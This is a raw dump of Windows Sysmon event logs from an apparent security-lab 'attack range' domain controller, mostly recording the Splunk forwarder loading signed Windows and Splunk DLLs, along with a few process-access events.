734700x8000000000000000101041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000101040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000101039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000101038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000101037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000101036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000101035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000101034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000101033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000101032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000101031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000101030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000101029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000101028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000101027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000101026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000101025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.921{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000101024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x8000000000000000101023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000101022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000101021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000101020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000101019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000101018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000101017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000101016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000101015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000101014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000101013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000101012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000101011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000101010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid 734700x8000000000000000101009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000101008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000101006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 10341000x8000000000000000101005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x8000000000000000101003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000101002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-C1A1-6294-4E0B-000000005502}768C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid 10341000x8000000000000000101001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:07:45.905{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 